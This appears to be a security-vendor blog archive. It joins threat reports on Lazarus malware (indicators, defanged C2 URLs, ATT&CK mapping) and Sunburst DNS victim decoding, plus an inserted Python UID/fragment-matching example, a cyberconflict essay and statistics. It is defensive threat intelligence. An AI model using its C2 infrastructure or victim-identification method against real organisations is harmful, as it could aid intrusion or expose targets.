16:24:53 Injection Success, Process ID : 544

Debugging log from the cryptocurrency business case:

Extracted Dll : [random 2bytes]svc.dll
Extracted Injecter : [random 2bytes]proc.exe
Reg Config Success !
Register Svc Success !
Start Injecter Success !

Regarding the pharmaceutical company incident, we previously concluded that Bookcode is used exclusively by the Lazarus group. According to our Kaspersky Threat Attribution Engine (KTAE), one of the Bookcode malware samples (MD5 0e44fcafab066abe99fe64ec6c46c84e) shows extensive code overlap with old Manuscrypt variants.

Kaspersky Threat Attribution Engine results for Bookcode

Moreover, the same strategy was used in the post-exploitation phase, for example the use of AdFind in the attack against the health ministry to collect further information on the victim's environment. The same tool was deployed in the pharmaceutical company case to extract the list of employees and computers from Active Directory. Although AdFind is a common post-exploitation tool, it is an additional data point indicating that the attackers share tools and methodologies.

Conclusions

These two incidents reveal the Lazarus group’s interest in intelligence related to COVID-19. While the group is mostly known for its financial activities, it is a good reminder that it can go after strategic research as well. We believe that all entities currently involved in activities such as vaccine research or crisis handling should be on high alert for cyberattacks.

Indicators of compromise

wAgent

dc3c2663bd9a991e0fbec791c20cbf92    %programdata%\oracle\javac.dat
26545f5abb70fc32ac62fdab6d0ea5b2    %programdata%\oracle\javac.dat
9c6ba9678ff986bcf858de18a3114ef3    %programdata%\grouppolicy\Policy.DAT

wAgent Installer

4814b06d056950749d07be2c799e8dc2    %programdata%\oracle\javac.io, %appdata%\ntuser.dat

wAgent compromised C2 servers

hxxp://client.livesistemas[.]com/Live/posto/system.jsp@public.jsp@jenkins.jsp@tomas.jsp@story.jsp
hxxps://iski.silogica[.]net/events/serial.jsp@WFRForms.jsp@import.jsp@view.jsp@cookie.jsp
hxxp://sistema.celllab[.]com.br/webrun/Navbar/auth.jsp@cache.jsp@legacy.jsp@chooseIcon.jsp@customZoom.jsp
hxxp://www.bytecortex.com[.]br/eletronicos/digital.jsp@exit.jsp@helpform.jsp@masks.jsp@Functions.jsp
hxxps://sac.najatelecom.com[.]br/sac/Dados/ntlm.jsp@loading.jsp@access.jsp@local.jsp@default.jsp

wAgent file path

%SystemRoot%\system32\[random 2 characters]svc.drv

wAgent registry path

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\eventlog\Application\Emulate - [random 2 characters]svc

Bookcode injector

5983db89609d0d94c3bcc88c6342b354    %SystemRoot%\system32\scaccessservice.exe, rasprocservice.exe

Bookcode file path

%SystemRoot%\system32\C_28705.NLS
%SystemRoot%\system32\gmslogmgr.dat

Bookcode compromised C2 servers

hxxps://www.kne.co[.]kr/upload/Customer/BBS.asp
hxxp://www.k-kiosk[.]com/bbs/notice_write.asp
hxxps://www.gongim[.]com/board/ajax_Write.asp
hxxp://www.cometnet[.]biz/framework/common/common.asp
hxxps://www.locknlockmall[.]com/common/popup_left.asp

MITRE ATT&CK Mapping

Tactic                 Technique   Technique name
Execution              T1059.003   Command and Scripting Interpreter: Windows Command Shell
Execution              T1569.002   System Services: Service Execution
Persistence            T1547.005   Boot or Logon Autostart Execution: Security Support Provider
Persistence            T1543.003   Create or Modify System Process: Windows Service
Privilege Escalation   T1547.005   Boot or Logon Autostart Execution: Security Support Provider
Privilege Escalation   T1543.003   Create or Modify System Process: Windows Service
Privilege Escalation   T1055.001   Process Injection: Dynamic-link Library Injection
Defense Evasion        T1070.006   Indicator Removal on Host: Timestomp
Defense Evasion        T1055.001   Process Injection: Dynamic-link Library Injection
Defense Evasion        T1140       Deobfuscate/Decode Files or Information
Defense Evasion        T1027.001   Obfuscated Files or Information: Binary Padding
Credential Access      T1003.002   OS Credential Dumping: Security Account Manager
Discovery              T1082       System Information Discovery
Discovery              T1033       System Owner/User Discovery
Discovery              T1049       System Network Connections Discovery
Lateral Movement       T1021.002   Remote Services: SMB/Windows Admin Shares
Command and Control    T1071.001   Application Layer Protocol: Web Protocols
Command and Control    T1132.001   Data Encoding: Standard Encoding
Exfiltration           T1041       Exfiltration Over C2 Channel

December 18, 2020

Sunburst: connecting the dots in the DNS requests

On December 13, 2020, FireEye published important details of a newly discovered supply chain attack. An unknown attacker, referred to as UNC2452 or DarkHalo, planted a backdoor in the SolarWinds Orion IT software. This backdoor, which comes in the form of a .NET module, has some really interesting and rather unique features.

We spent the past few days checking our own telemetry for signs of this attack, writing additional detections and making sure that our users are protected. At the moment, we have identified approximately 100 customers who downloaded the trojanized package containing the Sunburst backdoor. Further investigation is ongoing and we will continue to update this post with our findings.

Now, several things really stand out in this incident. This supply chain attack was designed in a very professional way, kind of putting the "A" in "APT", with a clear focus on staying undetected for as long as possible. For instance, before making the first internet connection to its C2s, the Sunburst malware lies dormant for a long period, up to two weeks, which prevents easy detection of this behavior in sandboxes. Other advanced threat groups are also known to adopt similar strategies, for instance with hardware or firmware implants, which "sleep" for weeks or months before connecting to their C2 infrastructure. This explains why this attack was so hard to spot.

One of the things that sets this apart from other cases is the peculiar victim profiling and validation scheme. Through the SolarWinds Orion IT packages, the attackers reached about 18,000 customers, according to the SolarWinds alert. Yet, out of these 18,000, it would appear that only a handful were interesting to them. Since having the resources to manually exploit 18,000 computer networks is probably beyond the reach of most if not all attackers, some of those networks must have been a higher priority. Finding which of the 18,000 networks were further exploited, received more malware, had persistence mechanisms installed and had data exfiltrated is likely to cast some light on the attacker's motives and priorities.

In the initial phases, the Sunburst malware talks to the C&C server by sending encoded DNS requests. These requests contain information about the infected computer; if the attackers deem it interesting enough, the DNS response includes a CNAME record pointing to a second level C&C server.

Our colleagues from FireEye published several DNS requests that supposedly led to CNAME responses on GitHub: https://github.com/fireeye/sunburst_countermeasures/blob/main/indicator_release/Indicator_Release_NBIs.csv

DNS CNAME request-response pairs (Copyright 2020 by FireEye, Inc.)

The goal

Knowing that the DNS requests generated by Sunburst encode some of the target’s information, the obvious next step would be to extract that information to find out who the victims are!

Our colleagues from QiAnXin Technology have already published a Python script to decode the domain names (on GitHub, of course): https://github.com/RedDrip7/SunBurst_DGA_Decode/blob/main/decode.py . Unfortunately, that script cannot decode all the DNS requests, and it is always good to practice reverse engineering anyway, so let's look at the malware code.

TL;DR

Three of the requests from FireEye’s Github repository can be mapped to two domain names that belong to a government organization and a telecommunications company in the US.

Low-level details

The sample we’ll be analyzing is 2c4a910a1299cdae2a4e55988a2f102e. All we need is a .NET decompiler (dnSpy is a good one).

The logic that is interesting to us is located in OrionImprovementBusinessLayer.Update, which in turn calls one of the four functions: GetCurrentString, GetPreviousString, GetNextStringEx and GetNextString.

These four functions correspond to four different DNS-based communication methods.

Now, to find out what kind of data is encoded in the DNS requests (the hostname variable), we need to look more closely at each of these functions.

The first function, GetCurrentString, generates strings that contain a supposedly unique target identifier (this.guid), the target's hostname (this.dnStrLower) and the rest of the hostname, which is in the form "appsync-api.*.avsvmcloud[.]com". The data is encoded by the functions CreateSecureString and CreateString.

The function GetPreviousString is bigger, but produces a similar hostname for a DNS request. It includes only a part of the target's hostname in each request, so as to stay within the request length limits. Each such request also includes a sequence number (this.nCount), the offset of the current substring from the beginning of the hostname.

The remaining two functions, GetNextStringEx and GetNextString, generate a different type of DNS request. They include only the target's UID, hashes of the running processes of interest and (only in the Ex version) the list and status of these processes. The target's UID is then encrypted, and the data is encoded with CreateSecureString.

The problem

The encryption used in the malware is just a simple XOR operation, and the encoding is either a substitution cipher or Base32 with a custom alphabet. However, if we reverse the sequence of operations of GetPreviousString or GetCurrentString for the known CNAME DNS requests published by FireEye, the resulting strings don’t look like valid domain names!

A possible explanation is that the requests were generated by the third or fourth communication method, GetNextStringEx or GetNextString. Indeed, they can be decoded without errors and the size of the decoded data fits. However, these requests don't include the target's name!

The solution

At this point, a question arises – can we match any of existing private and public DNS data for the malware root C2 domain, “avsvmcloud[.]com” with the CNAME records, to identify who was targeted for further exploitation?

A list of SUNBURST-generated domain names that include target domain names was kindly shared by John Bambenek on GitHub: https://github.com/bambenek/research/blob/main/sunburst/uniq-hostnames.txt .

Here’s a few such examples:
nnbggtlr1iv0v3vfnfaddfe.appsync-api.us-west-2.avsvmcloud[.]com
nq97kdu88pn1qpv8f3t5.appsync-api.us-east-1.avsvmcloud[.]com
nr2ia9qfa349b0q2oi60bou6iuir02rn.appsync-api.us-east-1.avsvmcloud[.]com

We complemented John’s data with our own datasets as well as other publicly available pDNS databases. Each one of these DNS requests also has the Base32-encoded UID. Since the UIDs are also included in other types of requests (types 3 and 4) in encrypted form, this allows us to match the requests!

The target's UID is calculated in OrionImprovementBusinessLayer.GetOrCreateUserID: the malware MD5-hashes a string derived from the MAC address of the first online network adapter (the decompiled code also appends the machine's domain name and its MachineGuid registry value), then XOR-folds the 16-byte digest into 8 bytes, so the UID is 64 bits wide.

The DNS requests published by FireEye on their GitHub have the following encrypted UIDs inside:

DNS request and the 64-bit UID it carries:

  • 6a57jk2ba1d9keg15cbg.appsync-api.eu-west-1.avsvmcloud[.]com: 0xEED328E059EB07FC
  • 7sbvaemscs0mc925tb99.appsync-api.us-west-2.avsvmcloud[.]com: 0x683D2C991E01711D
  • gq1h856599gqh538acqn.appsync-api.us-west-2.avsvmcloud[.]com: 0x2956497EB4DD0BF9
  • ihvpgv9psvq02ffo77et.appsync-api.us-east-2.avsvmcloud[.]com: 0xF7A37335B9E57DDB
  • k5kcubuassl3alrf7gm3.appsync-api.eu-west-1.avsvmcloud[.]com: 0xA46E6E874771323C
  • mhdosoksaccf9sni9icp.appsync-api.eu-west-1.avsvmcloud[.]com: 0xA46E6E874771323C

In total, we analyzed 1722 DNS records, leading to 1026 unique target name parts and 964 unique UIDs.

Matching the two lists we got the following data:
domain name part(0x2956497EB4DD0BF9)=central.****.g
domain name part(0x2956497EB4DD0BF9)=ov
domain name part(0x683D2C991E01711D)=central.****.g
domain name part(0x683D2C991E01711D)=ov
domain name part(0xF7A37335B9E57DDB)=***net.***.com
These steps effectively decoded 3 of the 6 CNAME records provided by FireEye into two possible domains:

***net.***.com – a rather big telecommunications company from the US, serving more than 6 million customers
central.***.gov – a governmental organization from the US
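The two steps that produced the result above, deriving the UID and joining hostname fragments to it, as an added Python example; this is not code from the post or from the decoders linked above. Decoding the DNS labels themselves (custom Base32 plus XOR) is left to those decoders; what is reproduced is the GetOrCreateUserID fold and the join over (UID, offset, fragment) triples that matches type-1/2 requests to the UIDs recovered from type-3/4 requests. Assumptions, also flagged in the code: the seed string is the MAC address without separators followed by the domain name and the MachineGuid, which is how the decompiled code is commonly read, and the folded value is printed big-endian; check both against the sample before relying on exact values. The fragments, UIDs and domain names are constructed.

```python
"""Reproduce the Sunburst victim UID and the UID-to-domain matching described above.

Added example, not code from the original post or from the published decoders. The
DNS label decoding itself is left to those decoders; this block covers the two steps
the text explains: how GetOrCreateUserID derives the 64-bit UID, and how domain
fragments from GetCurrentString/GetPreviousString requests are joined to the UIDs
recovered from GetNextString(Ex) requests that received CNAME answers.

Assumptions: seed = MAC (hex, no separators) + domain + MachineGuid, the reading of the
decompiled code reported by several analysts; the folded value is shown big-endian.
"""
import hashlib
from collections import defaultdict
from typing import Dict, Iterable, Set, Tuple


def xor_fold(digest: bytes) -> bytes:
    """Fold a 16-byte MD5 digest to 8 bytes: out[i] = digest[i] ^ digest[i + 8]."""
    if len(digest) != 16:
        raise ValueError("expected a 16-byte MD5 digest")
    out = bytearray(8)
    for i, b in enumerate(digest):
        out[i % 8] ^= b
    return bytes(out)


def compute_uid(mac: str, domain: str, machine_guid: str) -> int:
    """64-bit UID as GetOrCreateUserID builds it (see module docstring for assumptions)."""
    mac_hex = mac.upper().replace(":", "").replace("-", "")
    seed = (mac_hex + domain + machine_guid).encode("utf-8")
    return int.from_bytes(xor_fold(hashlib.md5(seed).digest()), "big")


def join_fragments(fragments: Iterable[Tuple[int, int, str]],
                   flagged: Set[int]) -> Dict[int, str]:
    """fragments: (uid, offset, part) triples from type-1/2 requests, offset being the
    nCount value (position of the part within the hostname).
    flagged: UIDs decoded from the type-3/4 requests that received CNAME answers.
    Returns uid -> reassembled target name for UIDs present in both sets."""
    parts = defaultdict(set)
    for uid, offset, part in fragments:
        if uid in flagged:
            parts[uid].add((offset, part))  # a set drops duplicates seen in several pDNS feeds
    joined = {}
    for uid, pieces in parts.items():
        name = ""
        for offset, part in sorted(pieces):
            if offset < len(name):  # overlapping capture: keep only the new tail
                part = part[len(name) - offset:]
            name += part
        joined[uid] = name
    return joined


# Constructed data standing in for the pDNS datasets; UIDs and names are fictitious.
SAMPLE_FRAGMENTS = [
    (0x1111111111111111, 0, "central.example.g"),
    (0x1111111111111111, 17, "ov"),
    (0x1111111111111111, 17, "ov"),                # same fragment from a second feed
    (0x2222222222222222, 0, "corpnet.example.com"),
    (0x3333333333333333, 0, "noise.example.org"),  # never received a CNAME answer
]
SAMPLE_FLAGGED = {0x1111111111111111, 0x2222222222222222, 0x4444444444444444}


if __name__ == "__main__":
    uid = compute_uid("00-0C-29-AB-CD-EF", "example", "deadbeef-0000-4000-8000-000000000000")
    print(f"UID for the constructed host: 0x{uid:016X}")
    for u, name in join_fragments(SAMPLE_FRAGMENTS, SAMPLE_FLAGGED).items():
        print(f"domain name part(0x{u:016X})={name}")
```

Note that 0x4444... is flagged but has no fragments in the sample, which is the situation for three of the six FireEye CNAME records above: a UID that received a CNAME answer can only be named if the corresponding type-1/2 requests were also captured somewhere.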

Please note that for ethical reasons, we do not include these exact domain names here. We notified the two organizations in question though, offering our support to discover further malicious activities, if needed.

It should also be noted that there is no way to be sure that machines in these two domains were actually further exploited. This being a probabilistic puzzle, we can assume with a high degree of certainty that the two decoded domains were interesting to the attackers; however, we cannot be 100% sure that the associated organizations were the subject of further malicious activities.

To summarize our research, the UIDs we discovered match two domain names that belong to a US government organization and a large US telecommunications company. It is likely that other interesting targets were selected by the attackers for further exploitation. If you happen to have access to large DNS databases, including CNAME replies for any subdomain in “avsvmcloud[.]com”, please let us know! (contact: intelreports (at) kaspersky [dot] com)

In order to help the community to potentially identify other interesting targets for the attackers, we are publishing the source code for the decoder:
https://github.com/2igosha/sunburst_dga

Stay safe!

More details and mitigations about Sunburst, UNC2452 / DarkHalo are available to customers of Kaspersky Intelligence Reporting. Contact: intelreports (at) kaspersky [dot] com

Sunburst / UNC2452 / DarkHalo FAQ
  1. Who is behind this attack? I read that some people say APT29/Dukes?
    At the moment, there are no technical links with previous attacks, so it may be an entirely new actor, or a previously known one that evolved their TTPs and opsec to the point where they can’t be linked anymore. Volexity, who previously worked on other incidents related to this, named the actor DarkHalo. FireEye named them “UNC2452”, suggesting an unknown actor. While some media sources linked this with APT29/Dukes, this appears to be either speculation or based on some other, unavailable data, or weak TTPs such as legitimate domain re-use.
  2. I use Orion IT! Was it a target of this attack?
    First of all, we recommend scanning your system with an updated security suite, capable of detecting the compromised packages from SolarWinds. Check your network traffic for all the publicly known IOCs – see https://github.com/fireeye/sunburst_countermeasures. The fact that someone downloaded the trojanized packages does not mean they were selected as a target of interest and received further malware, or suffered data exfiltration. It would appear, based on our observations and common sense, that only a handful of the 18,000 Orion IT customers were flagged by the attackers as interesting and were further exploited.
  3. Was this just espionage or did you observe destructive activities, such as ransomware?
    While the vast majority of high-profile incidents nowadays include ransomware or some sort of destructive payload (see NotPetya, WannaCry), in this case it would appear the main goal was espionage. The attackers showed a deep understanding and knowledge of Office 365, Azure, Exchange and PowerShell, and leveraged it in many creative ways to constantly monitor and extract e-mails from their true victims' systems.
  4. How many victims have been identified?
    Several publicly available data sets, such as the one from John Bambenek, include DNS requests encoding the victim names. It should be noted that these victim names are just the “first stage” recipients, not necessarily the ones the attackers deemed interesting. For instance, out of the ~100 Kaspersky users with the trojanized package, it would appear that none were interesting to the attackers to receive the 2nd stage of the attack.
  5. What are the most affected countries?
    To date, we observed users with the trojanized Orion IT package in 17 countries. However, the total number is likely to be larger, considering the official numbers from SolarWinds.
  6. Why are you calling this an attack, when it’s just exploitation? (CNA vs CNE)
    Sorry for the terminology, we simply refer to it as a “supply chain attack”. It would be odd to describe it as a “supply chain exploitation”.
  7. Out of the 18,000 first stage victims, how many were interesting to the attackers?
    This is difficult to estimate, mostly because of the lack of visibility and because the attackers were really careful in hiding their traces. Based on the CNAME records published by FireEye, we identified only two entities, a US government organization and a telecommunications company, who were tagged and “promoted” to dedicated C2s for additional exploitation.
  8. Why didn’t you catch this supply chain attack in the first place?
    That’s a good question! In particular, two things made it really stealthy. The slow communication method, in which the malware lies dormant for up to two weeks, is one of them. The other one is the lack of x86 shellcode; the attackers used a .NET injected module. Last but not least, there was no significant change in the file size of the module when the malicious code was added. We observed two suspicious modules in 2019, which jumped from the usual 500k to 900k for SolarWinds.Orion.Core.BusinessLayer.dll. When the malicious code was first added, in February 2020, the file didn’t change size in a significant manner. If the attackers did this on purpose, to avoid future detections, then it’s a pretty impressive thing.
  9. What is Teardrop?
    According to FireEye, Teardrop is malware delivered by the attackers to some of the victims. It is an unknown memory-only dropper suspected to deliver a customized version of the well-known CobaltStrike BEACON. To date, we haven’t detected any Teardrop samples anywhere.
  10. What made this such a successful operation?
    Probably, a combination of things – a supply chain attack, coupled with a very well thought first stage implant, careful victim selection strategies and last but not least, no obvious connections to any previously observed TTPs.
December 18, 2020

The future of cyberconflicts

The ever-increasing role of technology in every aspect of our society has turned cybersecurity into a major sovereignty issue for all states. Due to their asymmetrical nature, offensive cyber-capabilities have been embraced by many countries that wouldn’t otherwise have the resources to compete on a military or economic level with the most powerful nations of the world. Most modern inter-state conflicts and tensions today also take place in so-called cyberspace and we strongly believe that this trend will persist.

Such conflicts can take a vast number of forms, based on the objectives an attacker might pursue to undermine a competitor. In the context of this article, we will only focus on two of them: (1) Cyber-warfare for intelligence purposes, and (2) sabotage and interference with strategic systems in order to hinder a state’s ability to govern or project power.

Cyberspace and intelligence

Attempts to collect intelligence through technical means have been documented for years. The earliest example dates all the way back to 1996’s infamous Moonlight Maze campaign, where attackers stole so many documents a printout would have stood “thrice as high as the Washington monument”. Twenty-five years later, Kaspersky tracks over a hundred groups who perform similar operations. Here are a few reasons why they are so widespread:

  • Offensive security tools are readily available.
    • Intrusion software just as sophisticated as the frameworks developed by APT actors is gradually released to the public for free. This includes widely available proofs of concepts for software vulnerabilities to gain access to target machines, open-source malware implants to establish persistence and a myriad of tools that allow lateral movement inside breached networks. Newcomers to the cyber game benefit from the experience acquired by their predecessors and the research conducted by the industry as a whole, which helps them bootstrap their operations at a very affordable cost.
    • A flourishing market has developed around offensive security, where companies provide tools or even mercenary services. The ones that are willing to communicate about their activities swear that they will only do business with democratic governments, but it should be pointed out that they undergo virtually no oversight.
  • The difficulty of reliable technical attribution of cyberattacks ensures that instigators face very limited diplomatic repercussions (although a number of countries have recently developed legal frameworks which allow them to impose sanctions). A few countries have public doctrines or strategies pertaining to cyber-engagements, though those documents don’t always provide detailed and full answers on how countries will react, particularly, in the case of cyberattacks posing a threat to their national security, which countermeasures they would take, when cyberattacks would be qualified as use of force and, broadly speaking, how the UN charter’s article 51 pertaining to legitimate defense should be interpreted and applied. The earliest example of such a policy we could find is from the United States, in which they argue that article 51 does apply to cyberspace. France also has one, and a few other countries have also published their official positions on the application of international law to cyberspace (Estonia, Australia, Austria, Czech Republic, Finland, Iran, the Netherlands and the UK).

Cyberespionage attempts have been observed from all types of nations (emerging and robust cyber powers, countries that find themselves at the center of international tensions, and even countries which are traditionally considered allies) against all sorts of actors (government and non-government organizations, multinational companies, small businesses and individuals) to try to collect intelligence of any nature (technological, military, strategic). While the newer actors are filling the skills gap quickly, the most advanced parties are scaling to obtain global surveillance capabilities through technological supremacy. This involves developing the standards for tomorrow’s communications infrastructures and ensuring that they are adopted on a worldwide scale.

A particular example stands at the intersection of these two axes: the dispute pitting the US against China on the 5G standard. The US Defense Innovation Board points out the crucial impact of network topology on industry development and notes that the Department of Defense (DoD) itself will use the new standard; as a result, it feels it should have at least some degree of control over it. The US government has also publicly accused foreign technology companies of facilitating espionage operations on various occasions.

Recommendations
  • No state in the world has the technical ability to prevent cyberattacks, whether they target a country directly or target its industry.
    • In the short term, only bilateral agreements (such as the one between China and the US in 2015) appear to significantly reduce the number of incidents.
    • In the long term, a large number of experts needs to be trained to provide the private sector with enough resources to defend itself efficiently against cyberthreats.
  • The existing international instruments, such as the Wassenaar agreements do not provide a sufficiently binding legal framework to prevent companies from earning a profit by selling attack tools or vulnerabilities. Decision-makers should look into the proliferation of ICTs that can be used for malicious use.
  • The international community must find a way to create tomorrow’s standards conjointly. The competition between states to ensure control over the next technological tiers could result in a balkanization of the digital space.
  • Foreign companies, especially those developing network equipment or handling sensitive data, can only overcome mistrust if they are willing to subject themselves to stringent scrutiny.
    • States should adopt legislation detailing the obligations of any company willing to participate in public procurement for digital goods: source code access, formal proof of the software, having an audit conducted by a trusted third party.
Sabotage

Just because cyberspace conflicts take place in a virtual world doesn’t mean they cannot affect the physical realm. An overwhelming proportion of today’s human activity relies on information technology which implies that the former can be disrupted through the latter. A list of verticals that should be protected from foreign investments was introduced in French law: energy, water distribution, transportation, health, telecommunications. It’s easy enough to see that each of them is regulated by computer systems that constitute high-value targets for a hostile party.

The Ukrainian conflict, which seems to be used as a large-scale hybrid war experiment by some actors, gives an idea of the many ways cyberwarfare could be used to destabilize a country:

  • In May 2014, three days before the Ukrainian elections, a company called Infosafe IT withstood an attack aimed at preventing election results from being centralized. The day results were published, a fake press release announcing the victory of a far-right candidate was distributed through the electoral commission’s website.
  • A cyberattack against three Ukrainian energy providers on December 23, 2015, left 225,000 clients with no electricity for several hours. A similar incident happened in Kiev for about one hour on December 16, 2016.
  • On June 27, 2017, a Ukrainian tax accounting package used by most companies in the country (MeDoc) downloaded a malicious update that contained ransomware. Further analysis revealed that data decryption was not possible and that it was likely an attempt to destroy data forever. The incident caused over $10 billion in damages, making it the most destructive cyberattack in history.

In other countries, the Stuxnet worm comes to mind. This piece of malware contained four 0day exploits and was designed to infect SCADA systems in the Natanz nuclear plant in Iran. Infected systems would send erroneous commands to the underlying programmable logic controller (PLC) while still displaying expected results to the plant operators. This damaged the centrifuges and confused researchers, effectively slowing down Iran’s research in the nuclear physics field. But the general, modular design of Stuxnet indicates that variants could have been created to go after other types of SCADA systems. This detail could be indicative of a larger (and unpublished) sabotage doctrine followed by the creators of Stuxnet.

It is unclear whether it followed Stuxnet’s precedent, but a couple of years later, a wave of destructive attacks was launched against the oil industry in the Middle East. Shamoon was far from the sophistication level of our previous example, but it did major damage nonetheless. It involved a wiper malware whose purpose was to erase files from the victim’s computers and render them unusable. When it was first used in 2012, it disabled over 30,000 computers.

Then, in 2017, a Saudi refinery was targeted by an attack against its safety systems in a deliberate attempt to cause physical harm. The malware, dubbed Triton, was designed to tamper with an industrial safety system’s emergency shutdown function. Thankfully, the attack only resulted in interruption to a chemical process and did not cause the uncontrolled energy buildup the attackers were likely trying to achieve.

In recent years, many incidents have involved wipers: Dark Seoul and the Sony hack as well as operation Blockbuster attributed to the Lazarus Group, and others involving the StoneDrill malware we discovered while investigating Shamoon. So far, we are not aware of any casualties caused by destructive cyberattacks, but there’s little doubt that they are used as coercive force and can be construed as a form of violence. An interesting question is whether they could be interpreted as “acts of war”.

In August 2019, NATO released a cyber-resilience supplement in which the organization stated: “a serious cyberattack could trigger Article 5, where an attack against one ally is treated as an attack against all”. While the notion of “serious cyberattack” is not clearly defined, it does send a strong political signal that actions taking place in cyberspace can be interpreted as an attack and may in fact cause a collective response from the alliance. In the military sense, this declaration establishes cyberspace as a battleground. Other countries appear to share this view: in 2019, Israel bombed a building it claimed was used by Hamas to conduct cyberattacks against its interests. While this was not the first time a state went after hackers in the physical world, it was an unprecedented example of immediate cyber-to-kinetic escalation. Those few nations (i.e., the US and France) who published cyber-engagement policies usually reserve the right to respond to attacks in cyberspace through any appropriate means, which implicitly includes lethal force.

Since sabotage operations disrupt a government’s ability to rule or have the power to shut down a country’s economy, they represent a major threat to sovereignty. In the most extreme case, attacks in cyberspace can lay the ground for (or support) traditional military operations, for instance by disabling security systems or communication devices that would usually help organize the defensive response.

In the coming years, we can expect that:

  • The sort of attacks described above will become more widespread. The impact of these operations is now evident and they should be expected in any future armed conflict.
  • Some sabotage attempts will happen under a false flag to muddle diplomatic relations between two countries. Some actors have already taken significant steps to influence the way their actions would be interpreted:
    • The aforementioned MeDoc attack was disguised as a criminal ransomware attempt.
    • French TV channel TV5 Monde was hacked and taken off air for 18 hours in a destructive attack that also destroyed data. The hack was claimed by an ISIS-aligned group (Cyber Caliphate), but is believed to have originated from a Russian threat actor instead.
    • An attack against the PyeongChang Olympic games contained indicators implicating North Korea that we now know to be fake.
  • Diplomatic duress or retaliation might take place in the form of sabotage and cyber-capabilities will be used to exert pressure between states. For instance, critical infrastructure could be disabled, or local companies could be taken down as a way to express discontent. Demonstrating such offensive cyber-capabilities would convey strong messages that would be less of a commitment than moving troops.
Recommendations

In the interest of promoting cyber-stability and reducing the impact of sabotage, we would like to propose the following:

  • States should publish a doctrine that defines how they regard engagements in cyberspace, if they haven’t already done so. A more detailed call for transparency from Kaspersky can be found in the various contributions we submitted to the UN’s OEWG. This doctrine should take into account how uncertain the attribution process for cyberattacks is.
  • Making sure that critical systems are located exclusively on networks that are not connected to the internet. By spearheading the concept of cyber immunity, Eugene Kaspersky provides additional recommendations to make such infrastructure more resilient.
  • Clarifying rules of cyber-engagements at an international level as well as providing clarity on how they should be implemented both to ban and prevent destructive attacks targeting civilian infrastructure. We also advocate for greater clarity from states on how cyberconflicts can be de-escalated.
  • Having a proactive approach that aims at detecting intrusions in strategic entities (as opposed to simply preventing them). A sabotage operation requires months of preparation after the victim’s network has been breached. During that time, the defenders have a chance to discover the attackers and contain them before actual harm has been done.
Conclusion

It may seem naïve to imagine that the international community could at this moment reach a broad consensus regarding the rules for cyberwarfare or how the existing IHL applies to cyberspace. Yet over the past century, the world managed to define a number of acceptable rules for military conflicts: the Geneva Convention defines rights afforded to non-combatants. But while in traditional warfare it is easy to evaluate the cost (usually in human lives) of being subjected to certain practices, the nature of cybersecurity makes this quite difficult: intelligence collection and data theft are invisible, information campaigns can’t always be identified as such and sabotage may be indistinguishable from accidents. In other words, decision-makers have data that shows the benefit of unregulated cyberwarfare, thanks to their own operations, but are oblivious to what it costs them. This partial vision, shared by all actors, does not encourage moderation.

And so, this article closes on a pessimistic note. Do any of the parties involved have an interest in regulating cyberwarfare? If they did, would they even be aware of it? Historically, means of destruction could only be downsized thanks to civil protest and public pressure. In the end, no matter how far away or even unrealistic the dream of world peace seems to be, it is still one worth fighting for. As for the information technology field, it has been described as “young” and “growing” for the past 30 years. Maybe now is the time it became “adult”.

December 15, 2020

Kaspersky Security Bulletin 2020. Statistics

All statistics in this report are from the global cloud service Kaspersky Security Network (KSN), which receives information from components in our security solutions. The data was obtained from users who have given their consent to it being sent to KSN. Millions of Kaspersky users around the globe assist us in this endeavor to collect information about malicious activity. The statistics in this report cover the period from November 2019 to October 2020, inclusive.

Figures of the year
  • During the year, 10.18% of Internet user computers worldwide experienced at least one Malware-class attack.
  • Kaspersky solutions blocked 666,809,967 attacks launched from online resources in various countries across the world.
  • 173,335,902 unique URLs were recognized as malicious by Web Anti-Virus.
  • Our Web Anti-Virus blocked 33,412,568 unique malicious objects.
  • Ransomware attacks were defeated on the computers of 549,301 unique users.
  • During the reporting period, miners attacked 1,523,148 unique users.
  • Attempted infections by malware designed to steal money via online access to bank accounts were logged on the devices of 668,619 users.
December 14, 2020

Adaptive protection against invisible threats

Corporate endpoint security technologies for mid-sized companies struggle to surprise us with anything brand new. They provide reliable protection against malware and, when combined with relevant policies, regular updates, and employee cyberhygiene, they can shield a business from a majority of cyber-risks. For some, it may seem like you do not need more security than this… But is that really the case?

The answer, in short, is no. In fact, in most medium-sized companies’ cybersecurity strategies, even with an endpoint solution, there are likely to still be gaps that can and should be closed. In this article, we look at what those gaps are and how to fill them.

Legitimate software can hide risks

Detecting an exploit or trojan that explicitly runs on a device is not a problem for an antivirus solution. But when a malicious script is launched through a legitimate application, this can be a challenge. For example, when a phishing email document is opened in Microsoft Office, all actions will be performed by the office application.

Such authorized software is often used on a large number of devices, and it is not feasible to simply ban access to it. Antivirus solutions will also recognize these files as “trusted”, so may be unable to quickly “understand” that the piece of office software is executing atypical processes initiated by malicious code. Moreover, such activity can sometimes be started by administrators themselves as part of system maintenance. For example, the “trusted” Windows Management Engine on a remote machine can be used for deployment purposes. This further complicates the threat detection process.

What it can lead to: fileless malware, insider threats, miners and ransomware

Downloaders are one type of malware that uses this legitimate software cover. It does not itself perform any direct malicious actions on the device. Instead, it gets to the machine, for example, through a phishing email, and then independently downloads the real malicious code onto it.

There is a specific type of malware – fileless malware – that is often used as a downloader. It does not store itself on the hard disk, therefore tracking it with an ordinary antivirus solution is not easy. Because of that, fileless malware is often used in advanced targeted attacks, such as Platinum APT, whose victims were state and diplomatic organizations. Another example is the advanced PowerGhost cryptominer, which used trusted software for cryptocurrency mining. According to Kaspersky statistics, of all the anomalous activity detected in legitimate Windows Management Instrumentation (WMI) processes, two-thirds (67%) were fileless downloaders of the Emotet banking trojan and the WannaMine cryptominer. WMI on remote machines is often used by malware for lateral movement.


Malware families running in WMI (download)

Now, some might think that simply tightening policies and scaling down user privileges is the way to stop the malware from starting any process on the device. However, this is not an option, because fileless malware does not need administrator privileges to perform its malicious actions.

Another possible risk of authorized software exploitation occurs when malicious activity is initiated by someone on the network. If the company is lucky, it is just an employee who decided to mine coins using the corporate computing power. But in this case, since the actions are performed by a trusted user, administrators or a security solution may not be able to detect them.

Finally, some forms of malware can use legitimate processes to disguise themselves (svchost.exe, for example), which makes them more difficult to detect manually by IT security teams.

What can help? You need Little Red Riding Hood 2.0, who detects the wolf through external signs and calls lumberjacks before being eaten

